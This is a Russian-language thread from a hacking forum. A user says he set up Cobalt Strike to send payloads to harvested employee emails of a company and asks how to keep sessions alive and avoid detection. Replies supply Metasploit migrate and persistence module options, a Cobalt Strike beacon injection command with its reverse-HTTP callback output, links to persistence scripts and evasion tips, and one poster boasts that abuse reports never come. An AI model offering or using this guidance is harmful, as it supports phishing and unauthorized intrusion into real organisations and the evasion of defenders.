• XSS.stack #1 – первый литературный журнал от юзеров форума

Ну и чем хорош, этот ваш Cobalt Strike?

Отслеживать
n1ppyyyy

n1ppyyyy

(L1) cache
Забанен
Регистрация
05.10.2019
Сообщения
772
Реакции
392
Пожалуйста, обратите внимание, что пользователь заблокирован
Ну и чем хорош, этот ваш Cobalt Strike?

Название немного борзое, это лишь для привлечения внимания ;)
В общем, такие пироги. Сегодня поставил Кобальт, сделал свой первый пейлоад, закинул на виртуалку, запускаю иии...
И я полностью был разочарован в Кобальте. Сессия пропадает после того, как виртуалка ребутается, процессор легко килльнуть и вновь сессия будет потеряна.
В общем это как зимой ходить по тонкому льду. Шаг влево, шаг вправо - вот ты и потерял соединение .-.

Сегодня после установки кобальта - хотел послать пейлоад по мыльникам, которые смог найти у одной компании в дирах. Мыльники эти были сотрудников. Думал сейчас вот закину им всем пейлоад Кобальта, получу пару сессий и каким нибудь макаром пробьюсь на какой нибудь сервер, но нет..

Как я сказал выше - есть две (три) основных проблемы.
Процесс пейлоада легко килльнуть = потеря соединения
Ребут машины = потеря соединения
ну и сам пейлоад светится как новогодняя ёлка.

Прошу написать сюда ваше мнение на счёт Кобольта и вышеизложенных проблем. Так же было бы интересно почитать еще про то, что бы вы посылали на эти мыльники, вместо пейлоада Кобольта.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Stallman сказал(а):
А ты думал, что это легальный троян, с закрепом и криптором впридачу? Типа в сказку попал?
Ну я думал, что он хотя бы сессию после рестарта терять не будет =(
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Так же интересует ответ на вопрос. Как часто летят абузы на сервер с Кобальтом? (и летят ли вообще)
 
Смысл CS и Meterpreter в том, что оператор заходит на каждый хост и, в зависимости от обстановки, пишет автозагрузку, инжектит в процессы и т.д. Иначе есть большая вероятность тригнуть HIPS и прочие EDR.
Автоматически это всё можно заскриптовать, но это, опять-же, сильно зависит от ситуации.

NaMneCash сказал(а):
Процесс пейлоада легко килльнуть = потеря соединения
MSF:
Код: 
msf5 post(windows/manage/migrate) > show options

Module options (post/windows/manage/migrate):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   KILL       false            no        Kill original process for the session.
   NAME                        no        Name of process to migrate to.
   PID        0                no        PID of process to migrate to.
   PPID       0                no        Process Identifier for PPID spoofing when creating a new process. (0 = no PPID spoofing).
   PPID_NAME                   no        Name of process for PPID spoofing when creating a new process.
   SESSION                     yes       The session to run this module on.
   SPAWN      true             no        Spawn process to migrate to. If set, notepad.exe is used.


CS:
Код: 
beacon> inject 3784 x64 reverse_http_8080
[*] Tasked beacon to inject windows/beacon_http/reverse_http (10.1.0.23:8080) into 3784 (x64)
[+] host called home, sent: 904 bytes
beacon>


NaMneCash сказал(а):
Ребут машины = потеря соединения
MSF:
Код: 
msf5 post(windows/manage/persistence_exe) > show options

Module options (post/windows/manage/persistence_exe):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   REXENAME  default.exe      yes       The name to call exe on remote system
   REXEPATH                   yes       The remote executable to upload and execute.
   SESSION                    yes       The session to run this module on.
   STARTUP   USER             yes       Startup type for the persistent payload. (Accepted: USER, SYSTEM, SERVICE)

CS:
Код: 
Есть скрипты. Например:
https://github.com/Tom4t0/cobalt-strike-persistence

NaMneCash сказал(а):
ну и сам пейлоад светится как новогодняя ёлка.
Для этого в CS есть Artifact, а в Meterpreter - куча всякого на GitHub.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Pernat1y сказал(а):
Смысл CS и Meterpreter в том, что оператор заходит на каждый хост и, в зависимости от обстановки, пишет автозагрузку, инжектит в процессы и т.д. Иначе есть большая вероятность тригнуть HIPS и прочие EDR.
Автоматически это всё можно заскриптовать, но это, опять-же, сильно зависит от ситуации.


MSF:
Код: 
msf5 post(windows/manage/migrate) > show options

Module options (post/windows/manage/migrate):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   KILL       false            no        Kill original process for the session.
   NAME                        no        Name of process to migrate to.
   PID        0                no        PID of process to migrate to.
   PPID       0                no        Process Identifier for PPID spoofing when creating a new process. (0 = no PPID spoofing).
   PPID_NAME                   no        Name of process for PPID spoofing when creating a new process.
   SESSION                     yes       The session to run this module on.
   SPAWN      true             no        Spawn process to migrate to. If set, notepad.exe is used.


CS:
Код: 
beacon> inject 3784 x64 reverse_http_8080
[*] Tasked beacon to inject windows/beacon_http/reverse_http (10.1.0.23:8080) into 3784 (x64)
[+] host called home, sent: 904 bytes
beacon>



MSF:
Код: 
msf5 post(windows/manage/persistence_exe) > show options

Module options (post/windows/manage/persistence_exe):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   REXENAME  default.exe      yes       The name to call exe on remote system
   REXEPATH                   yes       The remote executable to upload and execute.
   SESSION                    yes       The session to run this module on.
   STARTUP   USER             yes       Startup type for the persistent payload. (Accepted: USER, SYSTEM, SERVICE)

CS:
Код: 
Есть скрипты. Например:
https://github.com/Tom4t0/cobalt-strike-persistence


Для этого в CS есть Artifact, а в Meterpreter - куча всякого на GitHub.
Огромное тебе спасибо!
Буду пользоваться и копать дальше!
Осталось только решить проблему с поднятием teamserver'a на домене, а не на Ip -.-
 
NaMneCash сказал(а):
Ну я думал, что он хотя бы сессию после рестарта терять не будет =(
Нужно делать бекдор, незнаю есть он в кобальте сам пользуюсь империей и с ссесией в ней лучше чем метасплоите.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Кобальт,эмпайр,мсф все идут в детект как хак тул, нужна постоянная чистка с каждой кампанией, выше уже все написали, пайлоад идет в оперативку, логично посудить, что при перезагрузки слетит сессия, чтобы такого не было нужна автозагрузка пайлоада, инжект в какой то процесс, повышение прав на машине и т.д. абузы не прилетали ниразу хотя юзаю я частенько
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх